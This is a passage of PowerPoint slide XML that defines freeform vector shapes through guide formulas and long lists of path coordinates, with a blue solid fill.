                  <a:gd name="T72" fmla="*/ 149 w 167"/>
                  <a:gd name="T73" fmla="*/ 9 h 278"/>
                  <a:gd name="T74" fmla="*/ 162 w 167"/>
                  <a:gd name="T75" fmla="*/ 2 h 278"/>
                  <a:gd name="T76" fmla="*/ 160 w 167"/>
                  <a:gd name="T77" fmla="*/ 13 h 278"/>
                  <a:gd name="T78" fmla="*/ 161 w 167"/>
                  <a:gd name="T79" fmla="*/ 23 h 278"/>
                  <a:gd name="T80" fmla="*/ 161 w 167"/>
                  <a:gd name="T81" fmla="*/ 39 h 278"/>
                  <a:gd name="T82" fmla="*/ 163 w 167"/>
                  <a:gd name="T83" fmla="*/ 50 h 278"/>
                  <a:gd name="T84" fmla="*/ 163 w 167"/>
                  <a:gd name="T85" fmla="*/ 65 h 278"/>
                  <a:gd name="T86" fmla="*/ 167 w 167"/>
                  <a:gd name="T87" fmla="*/ 69 h 278"/>
                  <a:gd name="T88" fmla="*/ 163 w 167"/>
                  <a:gd name="T89" fmla="*/ 80 h 278"/>
                  <a:gd name="T90" fmla="*/ 154 w 167"/>
                  <a:gd name="T91" fmla="*/ 93 h 278"/>
                  <a:gd name="T92" fmla="*/ 136 w 167"/>
                  <a:gd name="T93" fmla="*/ 108 h 278"/>
                  <a:gd name="T94" fmla="*/ 110 w 167"/>
                  <a:gd name="T95" fmla="*/ 119 h 278"/>
                  <a:gd name="T96" fmla="*/ 89 w 167"/>
                  <a:gd name="T97" fmla="*/ 141 h 278"/>
                  <a:gd name="T98" fmla="*/ 70 w 167"/>
                  <a:gd name="T99" fmla="*/ 155 h 278"/>
                  <a:gd name="T100" fmla="*/ 70 w 167"/>
                  <a:gd name="T101" fmla="*/ 167 h 278"/>
                  <a:gd name="T102" fmla="*/ 75 w 167"/>
                  <a:gd name="T103" fmla="*/ 177 h 278"/>
                  <a:gd name="T104" fmla="*/ 78 w 167"/>
                  <a:gd name="T105" fmla="*/ 194 h 278"/>
                  <a:gd name="T106" fmla="*/ 82 w 167"/>
                  <a:gd name="T107" fmla="*/ 195 h 278"/>
                  <a:gd name="T108" fmla="*/ 81 w 167"/>
                  <a:gd name="T109" fmla="*/ 216 h 278"/>
                  <a:gd name="T110" fmla="*/ 83 w 167"/>
                  <a:gd name="T111" fmla="*/ 224 h 278"/>
                  <a:gd name="T112" fmla="*/ 78 w 167"/>
                  <a:gd name="T113" fmla="*/ 234 h 278"/>
                  <a:gd name="T114" fmla="*/ 59 w 167"/>
                  <a:gd name="T115" fmla="*/ 244 h 278"/>
                  <a:gd name="T116" fmla="*/ 42 w 167"/>
                  <a:gd name="T117" fmla="*/ 252 h 278"/>
                  <a:gd name="T118" fmla="*/ 37 w 167"/>
                  <a:gd name="T119" fmla="*/ 264 h 278"/>
                  <a:gd name="T120" fmla="*/ 40 w 167"/>
                  <a:gd name="T121" fmla="*/ 277 h 27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67"/>
                  <a:gd name="T184" fmla="*/ 0 h 278"/>
                  <a:gd name="T185" fmla="*/ 167 w 167"/>
                  <a:gd name="T186" fmla="*/ 278 h 278"/>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67" h="278">
                    <a:moveTo>
                      <a:pt x="40" y="277"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="31" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="277"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36349" name="Freeform 81"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3220" y="3110"/>
                <a:ext cx="167" cy="278"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 167"/>
                  <a:gd name="T1" fmla="*/ 278 h 278"/>
                  <a:gd name="T2" fmla="*/ 28 w 167"/>
                  <a:gd name="T3" fmla="*/ 264 h 278"/>
                  <a:gd name="T4" fmla="*/ 27 w 167"/>
                  <a:gd name="T5" fmla="*/ 253 h 278"/>
                  <a:gd name="T6" fmla="*/ 26 w 167"/>
                  <a:gd name="T7" fmla="*/ 231 h 278"/>
                  <a:gd name="T8" fmla="*/ 18 w 167"/>
                  <a:gd name="T9" fmla="*/ 211 h 278"/>
                  <a:gd name="T10" fmla="*/ 18 w 167"/>
                  <a:gd name="T11" fmla="*/ 197 h 278"/>
                  <a:gd name="T12" fmla="*/ 34 w 167"/>
                  <a:gd name="T13" fmla="*/ 179 h 278"/>
                  <a:gd name="T14" fmla="*/ 36 w 167"/>
                  <a:gd name="T15" fmla="*/ 167 h 278"/>
                  <a:gd name="T16" fmla="*/ 44 w 167"/>
                  <a:gd name="T17" fmla="*/ 156 h 278"/>
                  <a:gd name="T18" fmla="*/ 38 w 167"/>
                  <a:gd name="T19" fmla="*/ 139 h 278"/>
                  <a:gd name="T20" fmla="*/ 43 w 167"/>
                  <a:gd name="T21" fmla="*/ 130 h 278"/>
                  <a:gd name="T22" fmla="*/ 42 w 167"/>
                  <a:gd name="T23" fmla="*/ 109 h 278"/>
                  <a:gd name="T24" fmla="*/ 34 w 167"/>
                  <a:gd name="T25" fmla="*/ 99 h 278"/>
                  <a:gd name="T26" fmla="*/ 13 w 167"/>
                  <a:gd name="T27" fmla="*/ 91 h 278"/>
                  <a:gd name="T28" fmla="*/ 1 w 167"/>
                  <a:gd name="T29" fmla="*/ 86 h 278"/>
                  <a:gd name="T30" fmla="*/ 0 w 167"/>
                  <a:gd name="T31" fmla="*/ 78 h 278"/>
                  <a:gd name="T32" fmla="*/ 16 w 167"/>
                  <a:gd name="T33" fmla="*/ 69 h 278"/>
                  <a:gd name="T34" fmla="*/ 44 w 167"/>
                  <a:gd name="T35" fmla="*/ 58 h 278"/>
                  <a:gd name="T36" fmla="*/ 51 w 167"/>
                  <a:gd name="T37" fmla="*/ 66 h 278"/>
                  <a:gd name="T38" fmla="*/ 63 w 167"/>
                  <a:gd name="T39" fmla="*/ 66 h 278"/>
                  <a:gd name="T40" fmla="*/ 67 w 167"/>
                  <a:gd name="T41" fmla="*/ 77 h 278"/>
                  <a:gd name="T42" fmla="*/ 62 w 167"/>
                  <a:gd name="T43" fmla="*/ 88 h 278"/>
                  <a:gd name="T44" fmla="*/ 67 w 167"/>
                  <a:gd name="T45" fmla="*/ 97 h 278"/>
                  <a:gd name="T46" fmla="*/ 78 w 167"/>
                  <a:gd name="T47" fmla="*/ 109 h 278"/>
                  <a:gd name="T48" fmla="*/ 78 w 167"/>
                  <a:gd name="T49" fmla="*/ 100 h 278"/>
                  <a:gd name="T50" fmla="*/ 82 w 167"/>
                  <a:gd name="T51" fmla="*/ 94 h 278"/>
                  <a:gd name="T52" fmla="*/ 87 w 167"/>
                  <a:gd name="T53" fmla="*/ 88 h 278"/>
                  <a:gd name="T54" fmla="*/ 84 w 167"/>
                  <a:gd name="T55" fmla="*/ 63 h 278"/>
                  <a:gd name="T56" fmla="*/ 68 w 167"/>
                  <a:gd name="T57" fmla="*/ 48 h 278"/>
                  <a:gd name="T58" fmla="*/ 64 w 167"/>
                  <a:gd name="T59" fmla="*/ 31 h 278"/>
                  <a:gd name="T60" fmla="*/ 73 w 167"/>
                  <a:gd name="T61" fmla="*/ 19 h 278"/>
                  <a:gd name="T62" fmla="*/ 88 w 167"/>
                  <a:gd name="T63" fmla="*/ 17 h 278"/>
                  <a:gd name="T64" fmla="*/ 93 w 167"/>
                  <a:gd name="T65" fmla="*/ 19 h 278"/>
                  <a:gd name="T66" fmla="*/ 111 w 167"/>
                  <a:gd name="T67" fmla="*/ 21 h 278"/>
                  <a:gd name="T68" fmla="*/ 120 w 167"/>
                  <a:gd name="T69" fmla="*/ 15 h 278"/>
                  <a:gd name="T70" fmla="*/ 128 w 167"/>
                  <a:gd name="T71" fmla="*/ 16 h 278"/>
                  <a:gd name="T72" fmla="*/ 149 w 167"/>
                  <a:gd name="T73" fmla="*/ 9 h 278"/>
                  <a:gd name="T74" fmla="*/ 162 w 167"/>
                  <a:gd name="T75" fmla="*/ 2 h 278"/>
                  <a:gd name="T76" fmla="*/ 160 w 167"/>
                  <a:gd name="T77" fmla="*/ 13 h 278"/>
                  <a:gd name="T78" fmla="*/ 161 w 167"/>
                  <a:gd name="T79" fmla="*/ 23 h 278"/>
                  <a:gd name="T80" fmla="*/ 161 w 167"/>
                  <a:gd name="T81" fmla="*/ 39 h 278"/>
                  <a:gd name="T82" fmla="*/ 163 w 167"/>
                  <a:gd name="T83" fmla="*/ 50 h 278"/>
                  <a:gd name="T84" fmla="*/ 163 w 167"/>
                  <a:gd name="T85" fmla="*/ 65 h 278"/>
                  <a:gd name="T86" fmla="*/ 167 w 167"/>
                  <a:gd name="T87" fmla="*/ 69 h 278"/>
                  <a:gd name="T88" fmla="*/ 163 w 167"/>
                  <a:gd name="T89" fmla="*/ 80 h 278"/>
                  <a:gd name="T90" fmla="*/ 154 w 167"/>
                  <a:gd name="T91" fmla="*/ 93 h 278"/>
                  <a:gd name="T92" fmla="*/ 136 w 167"/>
                  <a:gd name="T93" fmla="*/ 108 h 278"/>
                  <a:gd name="T94" fmla="*/ 110 w 167"/>
                  <a:gd name="T95" fmla="*/ 119 h 278"/>
                  <a:gd name="T96" fmla="*/ 89 w 167"/>
                  <a:gd name="T97" fmla="*/ 141 h 278"/>
                  <a:gd name="T98" fmla="*/ 70 w 167"/>
                  <a:gd name="T99" fmla="*/ 155 h 278"/>
                  <a:gd name="T100" fmla="*/ 70 w 167"/>
                  <a:gd name="T101" fmla="*/ 167 h 278"/>
                  <a:gd name="T102" fmla="*/ 75 w 167"/>
                  <a:gd name="T103" fmla="*/ 177 h 278"/>
                  <a:gd name="T104" fmla="*/ 78 w 167"/>
                  <a:gd name="T105" fmla="*/ 194 h 278"/>
                  <a:gd name="T106" fmla="*/ 82 w 167"/>
                  <a:gd name="T107" fmla="*/ 195 h 278"/>
                  <a:gd name="T108" fmla="*/ 81 w 167"/>
                  <a:gd name="T109" fmla="*/ 216 h 278"/>
                  <a:gd name="T110" fmla="*/ 83 w 167"/>
                  <a:gd name="T111" fmla="*/ 224 h 278"/>
                  <a:gd name="T112" fmla="*/ 78 w 167"/>
                  <a:gd name="T113" fmla="*/ 234 h 278"/>
                  <a:gd name="T114" fmla="*/ 59 w 167"/>
                  <a:gd name="T115" fmla="*/ 244 h 278"/>
                  <a:gd name="T116" fmla="*/ 42 w 167"/>
                  <a:gd name="T117" fmla="*/ 252 h 278"/>
                  <a:gd name="T118" fmla="*/ 37 w 167"/>
                  <a:gd name="T119" fmla="*/ 264 h 278"/>
                  <a:gd name="T120" fmla="*/ 40 w 167"/>
                  <a:gd name="T121" fmla="*/ 277 h 27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67"/>
                  <a:gd name="T184" fmla="*/ 0 h 278"/>
                  <a:gd name="T185" fmla="*/ 167 w 167"/>
                  <a:gd name="T186" fmla="*/ 278 h 278"/>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67" h="278">
                    <a:moveTo>
                      <a:pt x="40" y="277"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="31" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
